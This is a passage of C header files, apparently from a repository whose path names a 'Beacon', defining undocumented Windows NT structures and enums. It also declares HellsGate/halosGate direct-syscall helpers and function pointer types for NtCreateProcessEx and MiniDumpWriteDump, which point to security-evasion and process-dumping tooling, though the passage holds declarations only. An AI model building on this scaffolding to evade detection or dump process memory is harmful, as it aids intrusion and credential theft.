UCHAR Padding6[4]; 139 | PVOID SavedPriorityState; 140 | ULONG_PTR SoftPatchPtr1; 141 | ULONG_PTR ThreadPoolData; 142 | PVOID* TlsExpansionSlots; 143 | PVOID DeallocationBStore; 144 | PVOID BStoreLimit; 145 | ULONG ImpersonationLocale; 146 | ULONG IsImpersonating; 147 | PVOID NlsCache; 148 | PVOID pShimData; 149 | ULONG HeapVirtualAffinity; 150 | UCHAR Padding7[4]; 151 | HANDLE CurrentTransactionHandle; 152 | PVOID ActiveFrame; 153 | PVOID FlsData; 154 | PVOID PreferredLanguages; 155 | PVOID UserPrefLanguages; 156 | PVOID MergedPrefLanguages; 157 | ULONG MuiImpersonation; 158 | union 159 | { 160 | USHORT CrossTebFlags; 161 | struct 162 | { 163 | unsigned __int16 SpareCrossTebBits : 16; 164 | }; 165 | }; 166 | union 167 | { 168 | USHORT SameTebFlags; 169 | struct 170 | { 171 | unsigned __int16 DbgSafeThunkCall : 1; 172 | unsigned __int16 DbgInDebugPrint : 1; 173 | unsigned __int16 DbgHasFiberData : 1; 174 | unsigned __int16 DbgSkipThreadAttach : 1; 175 | unsigned __int16 DbgWerInShipAssertCode : 1; 176 | unsigned __int16 DbgIssuedInitialBp : 1; 177 | unsigned __int16 DbgClonedThread : 1; 178 | unsigned __int16 SpareSameTebBits : 9; 179 | }; 180 | }; 181 | PVOID TxnScopeEnterCallback; 182 | PVOID TxnScopeExitCallback; 183 | PVOID TxnScopeContext; 184 | ULONG LockCount; 185 | ULONG SpareUlong0; 186 | PVOID ResourceRetValue; 187 | } TEB, * PTEB; 188 | 189 | typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO 190 | { 191 | USHORT UniqueProcessId; 192 | USHORT CreatorBackTraceIndex; 193 | UCHAR ObjectTypeIndex; 194 | UCHAR HandleAttributes; 195 | USHORT HandleValue; 196 | PVOID Object; 197 | ULONG GrantedAccess; 198 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO; 199 | 200 | typedef struct _SYSTEM_HANDLE_INFORMATION 201 | { 202 | ULONG HandleCount; 203 | SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; 204 | } SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION; 205 | 206 | typedef struct _OBJECT_TYPES_INFORMATION { 207 | ULONG NumberOfTypes; 208 | } OBJECT_TYPES_INFORMATION, * POBJECT_TYPES_INFORMATION; 209 | 210 | typedef enum _OBJECT_INFORMATION_CLASS { 211 | ObjectBasicInformation, 212 | ObjectNameInformation, 213 | ObjectTypeInformation, 214 | ObjectTypesInformation, 215 | ObjectHandleFlagInformation, 216 | ObjectSessionInformation, 217 | ObjectSessionObjectInformation, 218 | MaxObjectInfoClass 219 | } OBJECT_INFORMATION_CLASS; 220 | 221 | typedef struct _OBJECT_TYPE_INFORMATION { 222 | UNICODE_STRING TypeName; 223 | ULONG TotalNumberOfObjects; 224 | ULONG TotalNumberOfHandles; 225 | ULONG TotalPagedPoolUsage; 226 | ULONG TotalNonPagedPoolUsage; 227 | ULONG TotalNamePoolUsage; 228 | ULONG TotalHandleTableUsage; 229 | ULONG HighWaterNumberOfObjects; 230 | ULONG HighWaterNumberOfHandles; 231 | ULONG HighWaterPagedPoolUsage; 232 | ULONG HighWaterNonPagedPoolUsage; 233 | ULONG HighWaterNamePoolUsage; 234 | ULONG HighWaterHandleTableUsage; 235 | ULONG InvalidAttributes; 236 | GENERIC_MAPPING GenericMapping; 237 | ULONG ValidAccessMask; 238 | BOOLEAN SecurityRequired; 239 | BOOLEAN MaintainHandleCount; 240 | ULONG PoolType; 241 | ULONG DefaultPagedPoolCharge; 242 | ULONG DefaultNonPagedPoolCharge; 243 | } OBJECT_TYPE_INFORMATION, * POBJECT_TYPE_INFORMATION; 244 | 245 | typedef struct _OBJECT_TYPE_INFORMATION_V2 { 246 | UNICODE_STRING TypeName; 247 | ULONG TotalNumberOfObjects; 248 | ULONG TotalNumberOfHandles; 249 | ULONG TotalPagedPoolUsage; 250 | ULONG TotalNonPagedPoolUsage; 251 | ULONG TotalNamePoolUsage; 252 | ULONG TotalHandleTableUsage; 253 | ULONG HighWaterNumberOfObjects; 254 | ULONG HighWaterNumberOfHandles; 255 | ULONG HighWaterPagedPoolUsage; 256 | ULONG HighWaterNonPagedPoolUsage; 257 | ULONG HighWaterNamePoolUsage; 258 | ULONG HighWaterHandleTableUsage; 259 | ULONG InvalidAttributes; 260 | GENERIC_MAPPING GenericMapping; 261 | ULONG ValidAccessMask; 262 | BOOLEAN SecurityRequired; 263 | BOOLEAN MaintainHandleCount; 264 | UCHAR TypeIndex; 265 | CHAR ReservedByte; 266 | ULONG PoolType; 267 | ULONG DefaultPagedPoolCharge; 268 | ULONG DefaultNonPagedPoolCharge; 269 | } OBJECT_TYPE_INFORMATION_V2, * POBJECT_TYPE_INFORMATION_V2; 270 | 271 | //typedef struct _OBJECT_ATTRIBUTES { 272 | // ULONG Length; 273 | // HANDLE RootDirectory; 274 | // PUNICODE_STRING ObjectName; 275 | // ULONG Attributes; 276 | // PVOID SecurityDescriptor; 277 | // PVOID SecurityQualityOfService; 278 | //} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 279 | 280 | typedef enum _FILE_INFORMATION_CLASS { 281 | FileDirectoryInformation = 1, 282 | FileFullDirectoryInformation, // 2 283 | FileBothDirectoryInformation, // 3 284 | FileBasicInformation, // 4 285 | FileStandardInformation, // 5 286 | FileInternalInformation, // 6 287 | FileEaInformation, // 7 288 | FileAccessInformation, // 8 289 | FileNameInformation, // 9 290 | FileRenameInformation, // 10 291 | FileLinkInformation, // 11 292 | FileNamesInformation, // 12 293 | FileDispositionInformation, // 13 294 | FilePositionInformation, // 14 295 | FileFullEaInformation, // 15 296 | FileModeInformation, // 16 297 | FileAlignmentInformation, // 17 298 | FileAllInformation, // 18 299 | FileAllocationInformation, // 19 300 | FileEndOfFileInformation, // 20 301 | FileAlternateNameInformation, // 21 302 | FileStreamInformation, // 22 303 | FilePipeInformation, // 23 304 | FilePipeLocalInformation, // 24 305 | FilePipeRemoteInformation, // 25 306 | FileMailslotQueryInformation, // 26 307 | FileMailslotSetInformation, // 27 308 | FileCompressionInformation, // 28 309 | FileObjectIdInformation, // 29 310 | FileCompletionInformation, // 30 311 | FileMoveClusterInformation, // 31 312 | FileQuotaInformation, // 32 313 | FileReparsePointInformation, // 33 314 | FileNetworkOpenInformation, // 34 315 | FileAttributeTagInformation, // 35 316 | FileTrackingInformation, // 36 317 | FileIdBothDirectoryInformation, // 37 318 | FileIdFullDirectoryInformation, // 38 319 | FileValidDataLengthInformation, // 39 320 | FileShortNameInformation, // 40 321 | FileIoCompletionNotificationInformation, // 41 322 | FileIoStatusBlockRangeInformation, // 42 323 | FileIoPriorityHintInformation, // 43 324 | FileSfioReserveInformation, // 44 325 | FileSfioVolumeInformation, // 45 326 | FileHardLinkInformation, // 46 327 | FileProcessIdsUsingFileInformation, // 47 328 | FileNormalizedNameInformation, // 48 329 | FileNetworkPhysicalNameInformation, // 49 330 | FileIdGlobalTxDirectoryInformation, // 50 331 | FileIsRemoteDeviceInformation, // 51 332 | FileUnusedInformation, // 52 333 | FileNumaNodeInformation, // 53 334 | FileStandardLinkInformation, // 54 335 | FileRemoteProtocolInformation, // 55 336 | 337 | // 338 | // These are special versions of these operations (defined earlier) 339 | // which can be used by kernel mode drivers only to bypass security 340 | // access checks for Rename and HardLink operations. These operations 341 | // are only recognized by the IOManager, a file system should never 342 | // receive these. 343 | // 344 | 345 | FileRenameInformationBypassAccessCheck, // 56 346 | FileLinkInformationBypassAccessCheck, // 57 347 | 348 | // 349 | // End of special information classes reserved for IOManager. 350 | // 351 | 352 | FileVolumeNameInformation, // 58 353 | FileIdInformation, // 59 354 | FileIdExtdDirectoryInformation, // 60 355 | FileReplaceCompletionInformation, // 61 356 | FileHardLinkFullIdInformation, // 62 357 | FileIdExtdBothDirectoryInformation, // 63 358 | FileDispositionInformationEx, // 64 359 | FileRenameInformationEx, // 65 360 | FileRenameInformationExBypassAccessCheck, // 66 361 | FileDesiredStorageClassInformation, // 67 362 | FileStatInformation, // 68 363 | FileMemoryPartitionInformation, // 69 364 | FileStatLxInformation, // 70 365 | FileCaseSensitiveInformation, // 71 366 | FileLinkInformationEx, // 72 367 | FileLinkInformationExBypassAccessCheck, // 73 368 | FileStorageReserveIdInformation, // 74 369 | FileCaseSensitiveInformationForceAccessCheck, // 75 370 | FileKnownFolderInformation, // 76 371 | 372 | FileMaximumInformation 373 | } FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS; 374 | 375 | typedef struct _IO_STATUS_BLOCK { 376 | union { 377 | NTSTATUS Status; 378 | PVOID Pointer; 379 | }; 380 | ULONG_PTR Information; 381 | } IO_STATUS_BLOCK, * PIO_STATUS_BLOCK; 382 | 383 | typedef const UNICODE_STRING* PCUNICODE_STRING; 384 | 385 | typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION 386 | { 387 | ULONG NumberOfProcessIdsInList; 388 | ULONG_PTR ProcessIdList[1]; 389 | } FILE_PROCESS_IDS_USING_FILE_INFORMATION, * PFILE_PROCESS_IDS_USING_FILE_INFORMATION; 390 | 391 | typedef struct _THREAD_PARAMETERS 392 | { 393 | int pid; 394 | wchar_t* cmdline; 395 | } THREAD_PARAMETERS; 396 | 397 | typedef NTSTATUS(NTAPI* pNtQuerySystemInformation)(ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 398 | typedef NTSTATUS(NTAPI* pNtQueryObject)(_In_opt_ HANDLE Handle, _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass, _Out_writes_bytes_opt_(ObjectInformationLength) PVOID ObjectInformation, _In_ ULONG ObjectInformationLength, _Out_opt_ PULONG ReturnLength); 399 | typedef NTSTATUS(NTAPI* pRtlCompareUnicodeString)(_In_ PCUNICODE_STRING String1, _In_ PCUNICODE_STRING String2, _In_ BOOLEAN CaseInSensitive); 400 | typedef NTSTATUS(NTAPI* pNtCreateProcessEx)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, HANDLE ParentProcess, ULONG Flags, HANDLE SectionHandle OPTIONAL, HANDLE DebugPort OPTIONAL, HANDLE ExceptionPort OPTIONAL, BOOLEAN InJob); 401 | typedef BOOL(WINAPI* pMiniDumpWriteDump)(HANDLE hProcess, DWORD dwPid, HANDLE hFile, int DumpType, PVOID ExceptionParam, PVOID UserStreamParam, PVOID CallbackParam); 402 | typedef NTSTATUS(NTAPI* pNtQueryInformationFile)(HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass); -------------------------------------------------------------------------------- /Beacon/GuangMing.h: -------------------------------------------------------------------------------- 1 | #define RTL_MAX_DRIVE_LETTERS 32 2 | 3 | 4 | DWORD GetSyscallNumber(char* Page,int len); 5 | extern VOID HellsGate(WORD wSystemCall); 6 | extern HellDescent(); 7 | 8 | EXTERN_C PVOID getntdll(); 9 | 10 | EXTERN_C PVOID getExportTable( 11 | IN PVOID moduleAddr 12 | ); 13 | 14 | EXTERN_C PVOID getExAddressTable( 15 | IN PVOID moduleExportTableAddr, 16 | IN PVOID moduleAddr 17 | ); 18 | 19 | EXTERN_C PVOID getExNamePointerTable( 20 | IN PVOID moduleExportTableAddr, 21 | IN PVOID moduleAddr 22 | ); 23 | 24 | EXTERN_C PVOID getExOrdinalTable( 25 | IN PVOID moduleExportTableAddr, 26 | IN PVOID moduleAddr 27 | ); 28 | 29 | EXTERN_C PVOID getApiAddr( 30 | IN DWORD apiNameStringLen, 31 | IN LPSTR apiNameString, 32 | IN PVOID moduleAddr, 33 | IN PVOID ExExAddressTable, 34 | IN PVOID ExNamePointerTable, 35 | IN PVOID ExOrdinalTable 36 | ); 37 | 38 | EXTERN_C DWORD findSyscallNumber( 39 | IN PVOID ntdllApiAddr 40 | ); 41 | 42 | EXTERN_C DWORD halosGate( 43 | IN PVOID ntdllApiAddr, 44 | IN WORD index 45 | ); 46 | 47 | EXTERN_C DWORD compExplorer( 48 | IN PVOID explorerWString 49 | ); 50 | 51 | typedef struct _UNICODE_STRING 52 | { 53 | USHORT Length; 54 | USHORT MaximumLength; 55 | PWSTR Buffer; 56 | } UNICODE_STRING, * PUNICODE_STRING; 57 | 58 | typedef struct _PS_ATTRIBUTE 59 | { 60 | ULONG Attribute; 61 | SIZE_T Size; 62 | union 63 | { 64 | ULONG Value; 65 | PVOID ValuePtr; 66 | } u1; 67 | PSIZE_T ReturnLength; 68 | } PS_ATTRIBUTE, * PPS_ATTRIBUTE; 69 | 70 | #define STATUS_BUFFER_TOO_SMALL 0xC0000004 71 | 72 | typedef struct _RTL_DRIVE_LETTER_CURDIR { 73 | USHORT Flags; 74 | USHORT Length; 75 | ULONG TimeStamp; 76 | UNICODE_STRING DosPath; 77 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; 78 | 79 | typedef struct _CURDIR 80 | { 81 | UNICODE_STRING DosPath; 82 | PVOID Handle; 83 | } CURDIR, * PCURDIR; 84 | 85 | 86 | typedef struct _RTL_USER_PROCESS_PARAMETERS 87 | { 88 | ULONG MaximumLength; 89 | ULONG Length; 90 | 91 | ULONG Flags; 92 | ULONG DebugFlags; 93 | 94 | HANDLE ConsoleHandle; 95 | ULONG ConsoleFlags; 96 | HANDLE StandardInput; 97 | HANDLE StandardOutput; 98 | HANDLE StandardError; 99 | 100 | CURDIR CurrentDirectory; 101 | UNICODE_STRING DllPath; 102 | UNICODE_STRING ImagePathName; 103 | UNICODE_STRING CommandLine; 104 | PVOID Environment; 105 | 106 | ULONG StartingX; 107 | ULONG StartingY; 108 | ULONG CountX; 109 | ULONG CountY; 110 | ULONG CountCharsX; 111 | ULONG CountCharsY; 112 | ULONG FillAttribute; 113 | 114 | ULONG WindowFlags; 115 | ULONG ShowWindowFlags; 116 | UNICODE_STRING WindowTitle; 117 | UNICODE_STRING DesktopInfo; 118 | UNICODE_STRING ShellInfo; 119 | UNICODE_STRING RuntimeData; 120 | RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 121 | 122 | ULONG EnvironmentSize; 123 | ULONG EnvironmentVersion; 124 | PVOID PackageDependencyData; 125 | ULONG ProcessGroupId; 126 | ULONG LoaderThreads; 127 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; 128 | 129 | typedef enum _PS_CREATE_STATE 130 | { 131 | PsCreateInitialState, 132 | PsCreateFailOnFileOpen, 133 | PsCreateFailOnSectionCreate, 134 | PsCreateFailExeFormat, 135 | PsCreateFailMachineMismatch, 136 | PsCreateFailExeName, 137 | PsCreateSuccess, 138 | PsCreateMaximumStates 139 | } PS_CREATE_STATE, * PPS_CREATE_STATE; 140 | 141 | typedef struct _OBJECT_ATTRIBUTES 142 | { 143 | ULONG Length; 144 | HANDLE RootDirectory; 145 | PUNICODE_STRING ObjectName; 146 | ULONG Attributes; 147 | PVOID SecurityDescriptor; 148 | PVOID SecurityQualityOfService; 149 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; 150 | 151 | typedef struct _PS_CREATE_INFO 152 | { 153 | SIZE_T Size; 154 | PS_CREATE_STATE State; 155 | union 156 | { 157 | // PsCreateInitialState 158 | struct { 159 | union { 160 | ULONG InitFlags; 161 | struct { 162 | UCHAR WriteOutputOnExit : 1; 163 | UCHAR DetectManifest : 1; 164 | UCHAR IFEOSkipDebugger : 1; 165 | UCHAR IFEODoNotPropagateKeyState : 1; 166 | UCHAR SpareBits1 : 4; 167 | UCHAR SpareBits2 : 8; 168 | USHORT ProhibitedImageCharacteristics : 16; 169 | }; 170 | }; 171 | ACCESS_MASK AdditionalFileAccess; 172 | } InitState; 173 | // PsCreateFailOnSectionCreate 174 | struct { 175 | HANDLE FileHandle; 176 | } FailSection; 177 | // PsCreateFailExeFormat 178 | struct { 179 | USHORT DllCharacteristics; 180 | } ExeFormat; 181 | // PsCreateFailExeName 182 | struct { 183 | HANDLE IFEOKey; 184 | } ExeName; 185 | // PsCreateSuccess 186 | struct { 187 | union { 188 | ULONG OutputFlags; 189 | struct { 190 | UCHAR ProtectedProcess : 1; 191 | UCHAR AddressSpaceOverride : 1; 192 | UCHAR DevOverrideEnabled : 1; // from Image File Execution Options 193 | UCHAR ManifestDetected : 1; 194 | UCHAR ProtectedProcessLight : 1; 195 | UCHAR SpareBits1 : 3; 196 | UCHAR SpareBits2 : 8; 197 | USHORT SpareBits3 : 16; 198 | }; 199 | }; 200 | HANDLE FileHandle; 201 | HANDLE SectionHandle; 202 | ULONGLONG UserProcessParametersNative; 203 | ULONG UserProcessParametersWow64; 204 | ULONG CurrentParameterFlags; 205 | ULONGLONG PebAddressNative; 206 | ULONG PebAddressWow64; 207 | ULONGLONG ManifestAddress; 208 | ULONG ManifestSize; 209 | } SuccessState; 210 | }; 211 | } PS_CREATE_INFO, * PPS_CREATE_INFO; 212 | 213 | typedef struct _PS_ATTRIBUTE_LIST 214 | { 215 | SIZE_T TotalLength; 216 | PS_ATTRIBUTE Attributes[1]; 217 | } PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST; 218 | 219 | 220 | typedef enum _KWAIT_REASON 221 | { 222 | Executive = 0, 223 | FreePage = 1, 224 | PageIn = 2, 225 | PoolAllocation = 3, 226 | DelayExecution = 4, 227 | Suspended = 5, 228 | UserRequest = 6, 229 | WrExecutive = 7, 230 | WrFreePage = 8, 231 | WrPageIn = 9, 232 | WrPoolAllocation = 10, 233 | WrDelayExecution = 11, 234 | WrSuspended = 12, 235 | WrUserRequest = 13, 236 | WrEventPair = 14, 237 | WrQueue = 15, 238 | WrLpcReceive = 16, 239 | WrLpcReply = 17, 240 | WrVirtualMemory = 18, 241 | WrPageOut = 19, 242 | WrRendezvous = 20, 243 | Spare2 = 21, 244 | Spare3 = 22, 245 | Spare4 = 23, 246 | Spare5 = 24, 247 | WrCalloutStack = 25, 248 | WrKernel = 26, 249 | WrResource = 27, 250 | WrPushLock = 28, 251 | WrMutex = 29, 252 | WrQuantumEnd = 30, 253 | WrDispatchInt = 31, 254 | WrPreempted = 32, 255 | WrYieldExecution = 33, 256 | WrFastMutex = 34, 257 | WrGuardedMutex = 35, 258 | WrRundown = 36, 259 | MaximumWaitReason = 37 260 | } KWAIT_REASON; 261 | 262 | typedef LONG KPRIORITY; 263 | 264 | typedef struct _CLIENT_ID 265 | { 266 | HANDLE UniqueProcess; 267 | HANDLE UniqueThread; 268 | } CLIENT_ID, * PCLIENT_ID; 269 | 270 | typedef struct _SYSTEM_THREAD_INFORMATION 271 | { 272 | LARGE_INTEGER KernelTime; 273 | LARGE_INTEGER UserTime; 274 | LARGE_INTEGER CreateTime; 275 | ULONG WaitTime; 276 | PVOID StartAddress; 277 | CLIENT_ID ClientId; 278 | KPRIORITY Priority; 279 | LONG BasePriority; 280 | ULONG ContextSwitches; 281 | ULONG ThreadState; 282 | KWAIT_REASON WaitReason; 283 | } SYSTEM_THREAD_INFORMATION, * PSYSTEM_THREAD_INFORMATION; 284 | 285 | 286 | typedef struct _SYSTEM_PROCESS_INFORMATION 287 | { 288 | ULONG NextEntryOffset; 289 | ULONG NumberOfThreads; 290 | LARGE_INTEGER WorkingSetPrivateSize; // since VISTA 291 | ULONG HardFaultCount; // since WIN7 292 | ULONG NumberOfThreadsHighWatermark; // since WIN7 293 | ULONGLONG CycleTime; // since WIN7 294 | LARGE_INTEGER CreateTime; 295 | LARGE_INTEGER UserTime; 296 | LARGE_INTEGER KernelTime; 297 | UNICODE_STRING ImageName; 298 | KPRIORITY BasePriority; 299 | HANDLE UniqueProcessId; 300 | HANDLE InheritedFromUniqueProcessId; 301 | ULONG HandleCount; 302 | ULONG SessionId; 303 | ULONG_PTR UniqueProcessKey; // since VISTA (requires SystemExtendedProcessInformation) 304 | SIZE_T PeakVirtualSize; 305 | SIZE_T VirtualSize; 306 | ULONG PageFaultCount; 307 | SIZE_T PeakWorkingSetSize; 308 | SIZE_T WorkingSetSize; 309 | SIZE_T QuotaPeakPagedPoolUsage; 310 | SIZE_T QuotaPagedPoolUsage; 311 | SIZE_T QuotaPeakNonPagedPoolUsage; 312 | SIZE_T QuotaNonPagedPoolUsage; 313 | SIZE_T PagefileUsage; 314 | SIZE_T PeakPagefileUsage; 315 | SIZE_T PrivatePageCount; 316 | LARGE_INTEGER ReadOperationCount; 317 | LARGE_INTEGER WriteOperationCount; 318 | LARGE_INTEGER OtherOperationCount; 319 | LARGE_INTEGER ReadTransferCount; 320 | LARGE_INTEGER WriteTransferCount; 321 | LARGE_INTEGER OtherTransferCount; 322 | SYSTEM_THREAD_INFORMATION Threads[1]; 323 | } SYSTEM_PROCESS_INFORMATION, * PSYSTEM_PROCESS_INFORMATION; 324 | 325 | // source:http://www.microsoft.com/whdc/system/Sysinternals/MoreThan64proc.mspx 326 | // https://processhacker.sourceforge.io/doc/ntexapi_8h_source.html#l01202 327 | typedef enum _SYSTEM_INFORMATION_CLASS 328 | { 329 | SystemBasicInformation, // q: SYSTEM_BASIC_INFORMATION 330 | SystemProcessorInformation, // q: SYSTEM_PROCESSOR_INFORMATION 331 | SystemPerformanceInformation, // q: SYSTEM_PERFORMANCE_INFORMATION 332 | SystemTimeOfDayInformation, // q: SYSTEM_TIMEOFDAY_INFORMATION 333 | SystemPathInformation, // not implemented 334 | SystemProcessInformation, // q: SYSTEM_PROCESS_INFORMATION 335 | SystemCallCountInformation, // q: SYSTEM_CALL_COUNT_INFORMATION 336 | SystemDeviceInformation, // q: SYSTEM_DEVICE_INFORMATION 337 | SystemProcessorPerformanceInformation, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION 338 | SystemFlagsInformation, // q: SYSTEM_FLAGS_INFORMATION 339 | SystemCallTimeInformation, // 10, not implemented 340 | SystemModuleInformation, // q: RTL_PROCESS_MODULES 341 | SystemLocksInformation, 342 | SystemStackTraceInformation, 343 | SystemPagedPoolInformation, // not implemented 344 | SystemNonPagedPoolInformation, // not implemented 345 | SystemHandleInformation, // q: SYSTEM_HANDLE_INFORMATION 346 | SystemObjectInformation, // q: SYSTEM_OBJECTTYPE_INFORMATION mixed with SYSTEM_OBJECT_INFORMATION 347 | SystemPageFileInformation, // q: SYSTEM_PAGEFILE_INFORMATION 348 | SystemVdmInstemulInformation, // q 349 | SystemVdmBopInformation, // 20, not implemented 350 | SystemFileCacheInformation, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemCache) 351 | SystemPoolTagInformation, // q: SYSTEM_POOLTAG_INFORMATION 352 | SystemInterruptInformation, // q: SYSTEM_INTERRUPT_INFORMATION 353 | SystemDpcBehaviorInformation, // q: SYSTEM_DPC_BEHAVIOR_INFORMATION; s: SYSTEM_DPC_BEHAVIOR_INFORMATION (requires SeLoadDriverPrivilege) 354 | SystemFullMemoryInformation, // not implemented 355 | SystemLoadGdiDriverInformation, // s (kernel-mode only) 356 | SystemUnloadGdiDriverInformation, // s (kernel-mode only) 357 | SystemTimeAdjustmentInformation, // q: SYSTEM_QUERY_TIME_ADJUST_INFORMATION; s: SYSTEM_SET_TIME_ADJUST_INFORMATION (requires SeSystemtimePrivilege) 358 | SystemSummaryMemoryInformation, // not implemented 359 | SystemMirrorMemoryInformation, // 30, s (requires license value "Kernel-MemoryMirroringSupported") (requires SeShutdownPrivilege) 360 | SystemPerformanceTraceInformation, // s 361 | SystemObsolete0, // not implemented 362 | SystemExceptionInformation, // q: SYSTEM_EXCEPTION_INFORMATION 363 | SystemCrashDumpStateInformation, // s (requires SeDebugPrivilege) 364 | SystemKernelDebuggerInformation, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION 365 | SystemContextSwitchInformation, // q: SYSTEM_CONTEXT_SWITCH_INFORMATION 366 | SystemRegistryQuotaInformation, // q: SYSTEM_REGISTRY_QUOTA_INFORMATION; s (requires SeIncreaseQuotaPrivilege) 367 | SystemExtendServiceTableInformation, // s (requires SeLoadDriverPrivilege) // loads win32k only 368 | SystemPrioritySeperation, // s (requires SeTcbPrivilege) 369 | SystemVerifierAddDriverInformation, // 40, s (requires SeDebugPrivilege) 370 | SystemVerifierRemoveDriverInformation, // s (requires SeDebugPrivilege) 371 | SystemProcessorIdleInformation, // q: SYSTEM_PROCESSOR_IDLE_INFORMATION 372 | SystemLegacyDriverInformation, // q: SYSTEM_LEGACY_DRIVER_INFORMATION 373 | SystemCurrentTimeZoneInformation, // q 374 | SystemLookasideInformation, // q: SYSTEM_LOOKASIDE_INFORMATION 375 | SystemTimeSlipNotification, // s (requires SeSystemtimePrivilege) 376 | SystemSessionCreate, // not implemented 377 | SystemSessionDetach, // not implemented 378 | SystemSessionInformation, // not implemented 379 | SystemRangeStartInformation, // 50, q 380 | SystemVerifierInformation, // q: SYSTEM_VERIFIER_INFORMATION; s (requires SeDebugPrivilege) 381 | SystemVerifierThunkExtend, // s (kernel-mode only) 382 | SystemSessionProcessInformation, // q: SYSTEM_SESSION_PROCESS_INFORMATION 383 | SystemLoadGdiDriverInSystemSpace, // s (kernel-mode only) (same as SystemLoadGdiDriverInformation) 384 | SystemNumaProcessorMap, // q 385 | SystemPrefetcherInformation, // q: PREFETCHER_INFORMATION; s: PREFETCHER_INFORMATION // PfSnQueryPrefetcherInformation 386 | SystemExtendedProcessInformation, // q: SYSTEM_PROCESS_INFORMATION 387 | SystemRecommendedSharedDataAlignment, // q 388 | SystemComPlusPackage, // q; s 389 | SystemNumaAvailableMemory, // 60 390 | SystemProcessorPowerInformation, // q: SYSTEM_PROCESSOR_POWER_INFORMATION 391 | SystemEmulationBasicInformation, // q 392 | SystemEmulationProcessorInformation, 393 | SystemExtendedHandleInformation, // q: SYSTEM_HANDLE_INFORMATION_EX 394 | SystemLostDelayedWriteInformation, // q: ULONG 395 | SystemBigPoolInformation, // q: SYSTEM_BIGPOOL_INFORMATION 396 | SystemSessionPoolTagInformation, // q: SYSTEM_SESSION_POOLTAG_INFORMATION 397 | SystemSessionMappedViewInformation, // q: SYSTEM_SESSION_MAPPED_VIEW_INFORMATION 398 | SystemHotpatchInformation, // q; s 399 | SystemObjectSecurityMode, // 70, q 400 | SystemWatchdogTimerHandler, // s (kernel-mode only) 401 | SystemWatchdogTimerInformation, // q (kernel-mode only); s (kernel-mode only) 402 | SystemLogicalProcessorInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION 403 | SystemWow64SharedInformationObsolete, // not implemented 404 | SystemRegisterFirmwareTableInformationHandler, // s (kernel-mode only) 405 | SystemFirmwareTableInformation, // not implemented 406 | SystemModuleInformationEx, // q: RTL_PROCESS_MODULE_INFORMATION_EX 407 | SystemVerifierTriageInformation, // not implemented 408 | SystemSuperfetchInformation, // q: SUPERFETCH_INFORMATION; s: SUPERFETCH_INFORMATION // PfQuerySuperfetchInformation 409 | SystemMemoryListInformation, // 80, q: SYSTEM_MEMORY_LIST_INFORMATION; s: SYSTEM_MEMORY_LIST_COMMAND (requires SeProfileSingleProcessPrivilege) 410 | SystemFileCacheInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (same as SystemFileCacheInformation) 411 | SystemThreadPriorityClientIdInformation, // s: SYSTEM_THREAD_CID_PRIORITY_INFORMATION (requires SeIncreaseBasePriorityPrivilege) 412 | SystemProcessorIdleCycleTimeInformation, // q: SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION[] 413 | SystemVerifierCancellationInformation, // not implemented // name:wow64:whNT32QuerySystemVerifierCancellationInformation 414 | SystemProcessorPowerInformationEx, // not implemented 415 | SystemRefTraceInformation, // q; s // ObQueryRefTraceInformation 416 | SystemSpecialPoolInformation, // q; s (requires SeDebugPrivilege) // MmSpecialPoolTag, then MmSpecialPoolCatchOverruns != 0 417 | SystemProcessIdInformation, // q: SYSTEM_PROCESS_ID_INFORMATION 418 | SystemErrorPortInformation, // s (requires SeTcbPrivilege) 419 | SystemBootEnvironmentInformation, // 90, q: SYSTEM_BOOT_ENVIRONMENT_INFORMATION 420 | SystemHypervisorInformation, // q; s (kernel-mode only) 421 | SystemVerifierInformationEx, // q; s 422 | SystemTimeZoneInformation, // s (requires SeTimeZonePrivilege) 423 | SystemImageFileExecutionOptionsInformation, // s: SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION (requires SeTcbPrivilege) 424 | SystemCoverageInformation, // q; s // name:wow64:whNT32QuerySystemCoverageInformation; ExpCovQueryInformation 425 | SystemPrefetchPatchInformation, // not implemented 426 | SystemVerifierFaultsInformation, // s (requires SeDebugPrivilege) 427 | SystemSystemPartitionInformation, // q: SYSTEM_SYSTEM_PARTITION_INFORMATION 428 | SystemSystemDiskInformation, // q: SYSTEM_SYSTEM_DISK_INFORMATION 429 | SystemProcessorPerformanceDistribution, // 100, q: SYSTEM_PROCESSOR_PERFORMANCE_DISTRIBUTION 430 | SystemNumaProximityNodeInformation, // q 431 | SystemDynamicTimeZoneInformation, // q; s (requires SeTimeZonePrivilege) 432 | SystemCodeIntegrityInformation, // q // SeCodeIntegrityQueryInformation 433 | SystemProcessorMicrocodeUpdateInformation, // s 434 | SystemProcessorBrandString, // q // HaliQuerySystemInformation -> HalpGetProcessorBrandString, info class 23 435 | SystemVirtualAddressInformation, // q: SYSTEM_VA_LIST_INFORMATION[]; s: SYSTEM_VA_LIST_INFORMATION[] (requires SeIncreaseQuotaPrivilege) 